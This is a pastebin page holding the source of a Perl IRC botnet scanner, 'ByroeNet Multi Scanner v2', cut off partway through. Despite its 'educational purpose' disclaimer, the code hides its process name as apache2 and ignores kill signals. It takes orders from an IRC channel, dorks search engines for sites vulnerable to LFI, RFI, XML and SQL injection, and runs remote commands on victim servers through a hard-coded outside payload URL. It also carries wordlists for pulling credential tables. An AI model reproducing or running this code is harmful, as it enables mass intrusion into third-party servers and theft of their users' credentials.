Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

Untitled

By: a guest on May 8th, 2012  |  syntax: None  |  size: 57.12 KB  |  hits: 33  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/usr/bin/perl
  2. $powered="ByroeNet";
  3. $mail="admin(at)byroe.net";
  4.   #####################################################################################
  5.   ##                                                                                 ##
  6.   ##                                                                   17/06/2010    ##
  7.   ##  Author  : ByroeNet Team                                                        ##
  8.   ##  Team    : Irc.Byroe.Net                                                        ##
  9.   ##  Regrets : Voo_Doo                                                              ##
  10.   ##                                                                                 ##
  11.   ##  ## IMPORTANT ##                                                                ##
  12.   ##   # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY          ##
  13.   ##   # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!                     ##
  14.   ##   # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR            ##
  15.   ##   # SYSTEM MORE SECURE.                                                         ##
  16.   ##  ##                                                                             ##
  17.   ##                                                                                 ##
  18.   ##  Features:                                                                      ##
  19.   ##    [+]Sql Injection Scanner                                                     ##
  20.   ##    [+]e107 Scanner                                                              ##
  21.   ##    [+]XML (Extensible Markup Language) Injection Scanner                        ##
  22.   ##    [+]Remote File Inclusion Scanner                                             ##
  23.   ##    [+]Local File Inclusion Scanner                                              ##
  24.   ##    [+]RCE r107 / LFI / XML                                                      ##
  25.   ##    [+]Integrated Shell, so you can execute commands on the server               ##
  26.   ##    [+]Spread Mode, to activate or disable Spread Function                       ##
  27.   ##                                                                                 ##
  28.   #####################################################################################
  29. use HTTP::Request;
  30. use LWP::UserAgent;
  31. use IO::Socket;
  32. use IO::Select;
  33. use IO::Socket::INET;
  34. use Socket;
  35. use HTTP::Request::Common;
  36. use LWP::Simple;
  37. use LWP 5.64;
  38. use HTTP::Request::Common qw(POST);
  39. use Digest::MD5 qw(md5_hex);
  40. use MIME::Base64;
  41. my $fakeproc    = "/usr/sbin/apache2 -k start";
  42. $ircserver      = "irc.byroe.net";
  43. my $ircport     = "6667";
  44. my $nickname    = "ByroeNet";
  45. my $ident       = "ByroeNet";
  46. my $channel     = "#vte";
  47. my $runner      = "ByroeNet";
  48. my $fullname    = 'ByroeNet New Scanner';
  49. my $lfi                 = "!lfi";
  50. my $xml                 = "!xml";
  51. my $e107                = "!e107";
  52. my $sql                 = "!sql";
  53. my $rfi                 = "!rfi";
  54. my $cmdlfi              = "!cmdlfi";
  55. my $cmde107     = "!cmde107";
  56. my $cmdxml              = "!cmdxml";
  57. my $rspo_test   = "../../../../../../../../../../../../../../../proc/self/environ%00";
  58. my $rfiid       = "http://cgmuscle.com///robots.txt?";
  59. my $byroesprd   = "http://cgmuscle.com///robots.txt?";
  60. my @tabele              = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
  61.                                         'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
  62.                                         'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
  63.                                         'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
  64.                                         'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
  65.                                         'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
  66.                                         'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
  67.                                         'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
  68.                                         'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
  69.                                         'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
  70. my @kolumny             = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
  71.                                         'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
  72.                                         'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
  73.                                         'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
  74.                                         'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
  75.                                         'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
  76. $SIG{'INT'}     = 'IGNORE';
  77. $SIG{'HUP'}     = 'IGNORE';
  78. $SIG{'TERM'}    = 'IGNORE';
  79. $SIG{'CHLD'}    = 'IGNORE';
  80. $SIG{'PS'}      = 'IGNORE';
  81. chdir("/tmp");
  82. $ircserver="$ARGV[0]" if $ARGV[0];
  83. $0 = "$fakeproc"."\0"x16;;
  84. &SIGN();
  85. my $pid = fork;
  86. exit if $pid;
  87. die "\n [!] Something Wrong !!!: $!" unless defined($pid);
  88. our %irc_servers;
  89. our %DCC;
  90. my $dcc_sel = new IO::Select->new();
  91. $sel_client = IO::Select->new();
  92. sub sendraw {
  93.     if ($#_ == '1') {
  94.     my $socket = $_[0];
  95.     print $socket "$_[1]\n";
  96.     } else {
  97.         print $IRC_cur_socket "$_[0]\n";
  98.     }
  99. }
  100. sub connector {
  101.     my $mynick = $_[0];
  102.     my $ircserver_con = $_[1];
  103.     my $ircport_con = $_[2];
  104.     my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  105.     if (defined($IRC_socket)) {
  106.         $IRC_cur_socket = $IRC_socket;
  107.         $IRC_socket->autoflush(1);
  108.         $sel_client->add($IRC_socket);
  109.         $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
  110.         $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
  111.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  112.         $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  113.         nick("$mynick");
  114.         sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
  115.         sleep 1;
  116.     }
  117. }
  118. sub parse {
  119.     my $servarg = shift;
  120.     if ($servarg =~ /^PING \:(.*)/) {
  121.         sendraw("PONG :$1");
  122.     } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  123.         my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  124.         if ($args =~ /^\001VERSION\001$/) {
  125.             notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
  126.         }
  127.         if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
  128.             my $natrix = $1;
  129.             my $arg = $2;
  130.         }
  131.     }
  132.     elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  133.         if (lc($1) eq lc($mynick)) {
  134.             $mynick=$4;
  135.             $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  136.         }
  137.     } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  138.         nick("$mynick|".int rand(9999));
  139.     } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  140.         $mynick = $2;
  141.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  142.         $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  143.         sendraw("MODE $nickname +Bx");
  144.         sendraw("JOIN $channel");
  145.         sendraw("PRIVMSG $channel :Hello, I`m Ready To Scanner");
  146.         sendraw("PRIVMSG $runner :Hi $runner im here !!!");
  147.     }
  148. }
  149. my $line_temp;
  150. while( 1 ) {
  151.     while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
  152.     delete($irc_servers{''}) if (defined($irc_servers{''}));
  153.     my @ready = $sel_client->can_read(0);
  154.     next unless(@ready);
  155.     foreach $fh (@ready) {
  156.         $IRC_cur_socket = $fh;
  157.         $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  158.         $nread = sysread($fh, $msg, 4096);
  159.         if ($nread == 0) {
  160.             $sel_client->remove($fh);
  161.             $fh->close;
  162.             delete($irc_servers{$fh});
  163.         }
  164.         @lines = split (/\n/, $msg);
  165.         $msg =~ s/\r\n$//;
  166.         if ($msg=~ /PRIVMSG $channel :!help/){
  167.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 ################## Vuln Scanner ###################");
  168.                 sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 #      ( $rfi/$lfi/$sql/$xml ) [bug] [dork]       #");
  169.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 ################### RCE Command ###################");
  170.                 sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 #                  $e107 [dork]                   #");
  171.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 ################# Execute Command #################");
  172.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 # ( $cmde107 /$cmdlfi / $cmdxml ) [target] [cmd]  #");
  173.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 ################### md5 Command ###################");
  174.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 #                   !dec / !enc                   #");
  175.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 #################### BOT Info #####################");
  176.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 #   !respon | !engine | !pid | !version | !about  #");
  177.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 ###################################################");
  178.         }
  179.         if ($msg=~ /PRIVMSG $channel :!version/){
  180.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Version15)10 Multi Scanner v2");
  181.         }
  182.         if ($msg=~ /PRIVMSG $channel :!engine/){
  183.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Engine15)10 Google, Bing, AllTheWeb, Altavista, ASK, UOL, Yahoo.");
  184.         }
  185.         if ($msg=~ /PRIVMSG $channel :!pid/){
  186.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3PID15)10 Process/ID : 4 $fakeproc - $$");
  187.         }
  188.         if ($msg=~ /PRIVMSG $channel :!about/){
  189.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3About15)3 Multi Scanner v2");
  190.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3About15)3 Coded by BaMbY ");
  191.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3About15)3 Copyright © 2010 ByroeNet");
  192.         }
  193.         ##################################################################### CMD IRC
  194.                 if ($msg=~ /PRIVMSG $channel :!enc\s+(.*)/){
  195.                         my $enc = $1;
  196.                         &enc($enc);
  197.                 }
  198.                 if ($msg=~ /PRIVMSG $channel :!dec\s+(.*)/){
  199.                         my $dec = $1;
  200.                         &dec($dec);
  201.                 }
  202.                 if ($msg=~ /PRIVMSG $channel :!btjoin\s+(.*)/){
  203.                         my $cnls = $1;
  204.                         &join($cnls);
  205.                 }
  206.                 if ($msg=~ /PRIVMSG $channel :!btpart\s+(.*)/){
  207.                         my $cnls = $1;
  208.                         &part($cnls);
  209.                 }
  210.                 if ($msg=~ /PRIVMSG $channel :!okdeh\s+(.*)/){
  211.                         my $cnls = $1;
  212.                         &quit($cnls);
  213.                 }
  214.                 if ($msg=~ /PRIVMSG $channel :!respon/){
  215.                         my $re = query($rfiid);
  216.                         if ( $re =~ /ByroeNet/ ) {
  217.                 sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Info15)3 Response is working !");
  218.             }
  219.             else {
  220.                 sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Info15)3 Response is 4NOT3 working !");
  221.             }
  222.         }
  223.         ##################################################################### CMD LFI
  224.                 if ($msg=~ /PRIVMSG $channel :$cmdlfi\s+(.*?)\s+(.*)/){
  225.                         my $url = $1."../../../../../../../../../../../../../../../proc/self/environ%00";
  226.                         my $cmd = $2;
  227.                         &cmdlfi($url,$cmd);
  228.                 }
  229.         #####################################################################
  230.         #####################         LFI LFI LFI         ###################
  231.         ##################################################################### Google Engine
  232.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  233.             if (my $pid = fork) {
  234.                 waitpid($pid, 0);
  235.             }
  236.             else {
  237.                 if (fork) {    exit; } else {
  238.                     my $engx = "GooGLe";
  239.                     my $bugx = $1;
  240.                     my $d0rk = $2;
  241.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)10 Dork :4 $d0rk");
  242.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)10 File :4 $bugx");
  243.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)7 Search Engine Loading ...");
  244.                     &lfiscan($engx,$bugx,$d0rk);
  245.                 }
  246.                 exit;
  247.             }
  248.         }
  249.  
  250.         ##################################################################### AllTheWeb Engine
  251.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  252.             if (my $pid = fork) {
  253.                 waitpid($pid, 0);
  254.             }
  255.             else {
  256.                 if (fork) {    exit; } else {
  257.                     my $engx = "AllTheWeb";
  258.                     my $bugx = $1;
  259.                     my $d0rk = $2;
  260.                     &lfiscan($engx,$bugx,$d0rk);
  261.                 }
  262.                 exit;
  263.             }
  264.         }
  265.  
  266.         ##################################################################### Bing Engine
  267.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  268.             if (my $pid = fork) {
  269.                 waitpid($pid, 0);
  270.             }
  271.             else {
  272.                 if (fork) {    exit; } else {
  273.                     my $engx = "Bing";
  274.                     my $bugx = $1;
  275.                     my $d0rk = $2;
  276.                     &lfiscan($engx,$bugx,$d0rk);
  277.                 }
  278.                 exit;
  279.             }
  280.         }
  281.  
  282.         ##################################################################### Altavista Engine
  283.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  284.             if (my $pid = fork) {
  285.                 waitpid($pid, 0);
  286.             }
  287.             else {
  288.                 if (fork) {    exit; } else {
  289.                     my $engx = "ALtaViSTa";
  290.                     my $bugx = $1;
  291.                     my $d0rk = $2;
  292.                     &lfiscan($engx,$bugx,$d0rk);
  293.                 }
  294.                 exit;
  295.             }
  296.         }
  297.  
  298.         ##################################################################### ASK Engine
  299.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  300.             if (my $pid = fork) {
  301.                 waitpid($pid, 0);
  302.             }
  303.             else {
  304.                 if (fork) {    exit; } else {
  305.                     my $engx = "AsK";
  306.                     my $bugx = $1;
  307.                     my $d0rk = $2;
  308.                     &lfiscan($engx,$bugx,$d0rk);
  309.                 }
  310.                 exit;
  311.             }
  312.         }
  313.  
  314.         ##################################################################### UoL Engine
  315.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  316.             if (my $pid = fork) {
  317.                 waitpid($pid, 0);
  318.             }
  319.             else {
  320.                 if (fork) {    exit; } else {
  321.                     my $engx = "UoL";
  322.                     my $bugx = $1;
  323.                     my $d0rk = $2;
  324.                     &lfiscan($engx,$bugx,$d0rk);
  325.                 }
  326.                 exit;
  327.             }
  328.         }
  329.  
  330.         ##################################################################### Yahoo Engine
  331.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  332.             if (my $pid = fork) {
  333.                 waitpid($pid, 0);
  334.             }
  335.             else {
  336.                 if (fork) {    exit; } else {
  337.                     my $engx = "YahOo";
  338.                     my $bugx = $1;
  339.                     my $d0rk = $2;
  340.                     &lfiscan($engx,$bugx,$d0rk);
  341.                 }
  342.                 exit;
  343.             }
  344.         }
  345.         #####################################################################
  346.         #####################         XML XML XML         ###################
  347.                 #####################################################################
  348.                 if ($msg=~ /PRIVMSG $channel :$cmdxml\s+(.*?)\s+(.*)/){
  349.                         my $url = $1;
  350.                         my $cmd = $2;
  351.                         &cmdxml($url,$cmd);
  352.                 }
  353.         ##################################################################### GooGle Engine            
  354.                 if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  355.             if (my $pid = fork) {
  356.                 waitpid($pid, 0);
  357.             }
  358.             else {
  359.                 if (fork) {    exit; } else {
  360.                     my $engx = "GooGLe";
  361.                     my $bugx = $1;
  362.                     my $d0rk = $2;
  363.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XML15)10 Dork :4 $d0rk");
  364.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XML15)10 File :4 $bugx");
  365.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XML15)7 Search Engine Loading ...");
  366.                     &xmlscan($engx,$bugx,$d0rk);
  367.                 }
  368.                 exit;
  369.             }
  370.         }
  371.         ##################################################################### AllTheWeb Engine
  372.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  373.             if (my $pid = fork) {
  374.                 waitpid($pid, 0);
  375.             }
  376.             else {
  377.                 if (fork) {    exit; } else {
  378.                     my $engx = "AllTheWeb";
  379.                     my $bugx = $1;
  380.                     my $d0rk = $2;
  381.                     &xmlscan($engx,$bugx,$d0rk);
  382.                 }
  383.                 exit;
  384.             }
  385.         }
  386.  
  387.         ##################################################################### Bing Engine
  388.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  389.             if (my $pid = fork) {
  390.                 waitpid($pid, 0);
  391.             }
  392.             else {
  393.                 if (fork) {    exit; } else {
  394.                     my $engx = "Bing";
  395.                     my $bugx = $1;
  396.                     my $d0rk = $2;
  397.                     &xmlscan($engx,$bugx,$d0rk);
  398.                 }
  399.                 exit;
  400.             }
  401.         }
  402.  
  403.         ##################################################################### Altavista Engine
  404.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  405.             if (my $pid = fork) {
  406.                 waitpid($pid, 0);
  407.             }
  408.             else {
  409.                 if (fork) {    exit; } else {
  410.                     my $engx = "ALtaViSTa";
  411.                     my $bugx = $1;
  412.                     my $d0rk = $2;
  413.                     &xmlscan($engx,$bugx,$d0rk);
  414.                 }
  415.                 exit;
  416.             }
  417.         }
  418.  
  419.         ##################################################################### ASK Engine
  420.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  421.             if (my $pid = fork) {
  422.                 waitpid($pid, 0);
  423.             }
  424.             else {
  425.                 if (fork) {    exit; } else {
  426.                     my $engx = "AsK";
  427.                     my $bugx = $1;
  428.                     my $d0rk = $2;
  429.                     &xmlscan($engx,$bugx,$d0rk);
  430.                 }
  431.                 exit;
  432.             }
  433.         }
  434.  
  435.         ##################################################################### UoL Engine
  436.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  437.             if (my $pid = fork) {
  438.                 waitpid($pid, 0);
  439.             }
  440.             else {
  441.                 if (fork) {    exit; } else {
  442.                     my $engx = "UoL";
  443.                     my $bugx = $1;
  444.                     my $d0rk = $2;
  445.                     &xmlscan($engx,$bugx,$d0rk);
  446.                 }
  447.                 exit;
  448.             }
  449.         }
  450.  
  451.         ##################################################################### Yahoo Engine
  452.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  453.             if (my $pid = fork) {
  454.                 waitpid($pid, 0);
  455.             }
  456.             else {
  457.                 if (fork) {    exit; } else {
  458.                     my $engx = "YahOo";
  459.                     my $bugx = $1;
  460.                     my $d0rk = $2;
  461.                     &xmlscan($engx,$bugx,$d0rk);
  462.                 }
  463.                 exit;
  464.             }
  465.         }
  466.                
  467.                 #####################################################################
  468.         #####################         RFI RFI RFI         ###################
  469.         ##################################################################### GooGle Engine            
  470.                
  471.                 if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  472.             if (my $pid = fork) {
  473.                 waitpid($pid, 0);
  474.             }
  475.             else {
  476.                 if (fork) {    exit; } else {
  477.                     my $engx = "GooGLe";
  478.                     my $bugx = $1;
  479.                     my $d0rk = $2;
  480.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3RFI15)10 Dork :4 $d0rk");
  481.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3RFI15)10 File :4 $bugx");
  482.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3RFI15)7 Search Engine Loading ...");
  483.                     &rfiscan($engx,$bugx,$d0rk);
  484.                 }
  485.                 exit;
  486.             }
  487.         }
  488.  
  489.         ##################################################################### AllTheWeb Engine
  490.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  491.             if (my $pid = fork) {
  492.                 waitpid($pid, 0);
  493.             }
  494.             else {
  495.                 if (fork) {    exit; } else {
  496.                     my $engx = "AllTheWeb";
  497.                     my $bugx = $1;
  498.                     my $d0rk = $2;
  499.                     &rfiscan($engx,$bugx,$d0rk);
  500.                 }
  501.                 exit;
  502.             }
  503.         }
  504.  
  505.         ##################################################################### Bing Engine
  506.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  507.             if (my $pid = fork) {
  508.                 waitpid($pid, 0);
  509.             }
  510.             else {
  511.                 if (fork) {    exit; } else {
  512.                     my $engx = "Bing";
  513.                     my $bugx = $1;
  514.                     my $d0rk = $2;
  515.                     &rfiscan($engx,$bugx,$d0rk);
  516.                 }
  517.                 exit;
  518.             }
  519.         }
  520.  
  521.         ##################################################################### Altavista Engine
  522.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  523.             if (my $pid = fork) {
  524.                 waitpid($pid, 0);
  525.             }
  526.             else {
  527.                 if (fork) {    exit; } else {
  528.                     my $engx = "ALtaViSTa";
  529.                     my $bugx = $1;
  530.                     my $d0rk = $2;
  531.                     &rfiscan($engx,$bugx,$d0rk);
  532.                 }
  533.                 exit;
  534.             }
  535.         }
  536.  
  537.         ##################################################################### ASK Engine
  538.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  539.             if (my $pid = fork) {
  540.                 waitpid($pid, 0);
  541.             }
  542.             else {
  543.                 if (fork) {    exit; } else {
  544.                     my $engx = "AsK";
  545.                     my $bugx = $1;
  546.                     my $d0rk = $2;
  547.                     &rfiscan($engx,$bugx,$d0rk);
  548.                 }
  549.                 exit;
  550.             }
  551.         }
  552.  
  553.         ##################################################################### UoL Engine
  554.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  555.             if (my $pid = fork) {
  556.                 waitpid($pid, 0);
  557.             }
  558.             else {
  559.                 if (fork) {    exit; } else {
  560.                     my $engx = "UoL";
  561.                     my $bugx = $1;
  562.                     my $d0rk = $2;
  563.                     &rfiscan($engx,$bugx,$d0rk);
  564.                 }
  565.                 exit;
  566.             }
  567.         }
  568.  
  569.         ##################################################################### Yahoo Engine
  570.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  571.             if (my $pid = fork) {
  572.                 waitpid($pid, 0);
  573.             }
  574.             else {
  575.                 if (fork) {    exit; } else {
  576.                     my $engx = "YahOo";
  577.                     my $bugx = $1;
  578.                     my $d0rk = $2;
  579.                     &rfiscan($engx,$bugx,$d0rk);
  580.                 }
  581.                 exit;
  582.             }
  583.         }
  584.                 #####################################################################
  585.         #####################         SQL SQL SQL         ###################
  586.         ##################################################################### GooGle Engine            
  587.                
  588.                 if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  589.             if (my $pid = fork) {
  590.                 waitpid($pid, 0);
  591.             }
  592.             else {
  593.                 if (fork) {    exit; } else {
  594.                     my $engx = "GooGLe";
  595.                     my $bugx = $1;
  596.                     my $d0rk = $2;
  597.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)10 Dork :4 $d0rk");
  598.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)10 File :4 $bugx");
  599.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)7 Search Engine Loading ...");
  600.                     &sqlscan($engx,$bugx,$d0rk);
  601.                 }
  602.                 exit;
  603.             }
  604.         }
  605.  
  606.         ##################################################################### AllTheWeb Engine
  607.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  608.             if (my $pid = fork) {
  609.                 waitpid($pid, 0);
  610.             }
  611.             else {
  612.                 if (fork) {    exit; } else {
  613.                     my $engx = "AllTheWeb";
  614.                     my $bugx = $1;
  615.                     my $d0rk = $2;
  616.                     &sqlscan($engx,$bugx,$d0rk);
  617.                 }
  618.                 exit;
  619.             }
  620.         }
  621.  
  622.         ##################################################################### Bing Engine
  623.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  624.             if (my $pid = fork) {
  625.                 waitpid($pid, 0);
  626.             }
  627.             else {
  628.                 if (fork) {    exit; } else {
  629.                     my $engx = "Bing";
  630.                     my $bugx = $1;
  631.                     my $d0rk = $2;
  632.                     &sqlscan($engx,$bugx,$d0rk);
  633.                 }
  634.                 exit;
  635.             }
  636.         }
  637.  
  638.         ##################################################################### Altavista Engine
  639.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  640.             if (my $pid = fork) {
  641.                 waitpid($pid, 0);
  642.             }
  643.             else {
  644.                 if (fork) {    exit; } else {
  645.                     my $engx = "ALtaViSTa";
  646.                     my $bugx = $1;
  647.                     my $d0rk = $2;
  648.                     &sqlscan($engx,$bugx,$d0rk);
  649.                 }
  650.                 exit;
  651.             }
  652.         }
  653.  
  654.         ##################################################################### ASK Engine
  655.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  656.             if (my $pid = fork) {
  657.                 waitpid($pid, 0);
  658.             }
  659.             else {
  660.                 if (fork) {    exit; } else {
  661.                     my $engx = "AsK";
  662.                     my $bugx = $1;
  663.                     my $d0rk = $2;
  664.                     &sqlscan($engx,$bugx,$d0rk);
  665.                 }
  666.                 exit;
  667.             }
  668.         }
  669.  
  670.         ##################################################################### UoL Engine
  671.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  672.             if (my $pid = fork) {
  673.                 waitpid($pid, 0);
  674.             }
  675.             else {
  676.                 if (fork) {    exit; } else {
  677.                     my $engx = "UoL";
  678.                     my $bugx = $1;
  679.                     my $d0rk = $2;
  680.                     &sqlscan($engx,$bugx,$d0rk);
  681.                 }
  682.                 exit;
  683.             }
  684.         }
  685.  
  686.         ##################################################################### Yahoo Engine
  687.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  688.             if (my $pid = fork) {
  689.                 waitpid($pid, 0);
  690.             }
  691.             else {
  692.                 if (fork) {    exit; } else {
  693.                     my $engx = "YahOo";
  694.                     my $bugx = $1;
  695.                     my $d0rk = $2;
  696.                     &sqlscan($engx,$bugx,$d0rk);
  697.                 }
  698.                 exit;
  699.             }
  700.         }
  701.                 #####################################################################
  702.         #####################       e107 e107 e107        ###################
  703.         ##################################################################### GooGle Engine            
  704.                 if ($msg=~ /PRIVMSG $channel :$cmde107\s+(.*?)\s+(.*)/){
  705.                         my $url = $1;
  706.                         my $cmd = $2;
  707.                         &cmde107($url,$cmd);
  708.                 }
  709.                 if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
  710.             if (my $pid = fork) {
  711.                 waitpid($pid, 0);
  712.             }
  713.             else {
  714.                 if (fork) {    exit; } else {
  715.                     my $engx = "GooGLe";
  716.                     my $bugx = "/contact.php";
  717.                     my $d0rk = $1;
  718.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3e10715)10 Dork :4 $d0rk");
  719.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3e10715)10 File :4 $bugx");
  720.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3e10715)7 Search Engine Loading ...");
  721.                     &e107scan($engx,$bugx,$d0rk);
  722.                 }
  723.                 exit;
  724.             }
  725.         }
  726.  
  727.         ##################################################################### AllTheWeb Engine
  728.         if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
  729.             if (my $pid = fork) {
  730.                 waitpid($pid, 0);
  731.             }
  732.             else {
  733.                 if (fork) {    exit; } else {
  734.                     my $engx = "AllTheWeb";
  735.                     my $bugx = "/contact.php";
  736.                     my $d0rk = $1;
  737.                     &e107scan($engx,$bugx,$d0rk);
  738.                 }
  739.                 exit;
  740.             }
  741.         }
  742.  
  743.         ##################################################################### Bing Engine
  744.         if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
  745.             if (my $pid = fork) {
  746.                 waitpid($pid, 0);
  747.             }
  748.             else {
  749.                 if (fork) {    exit; } else {
  750.                     my $engx = "Bing";
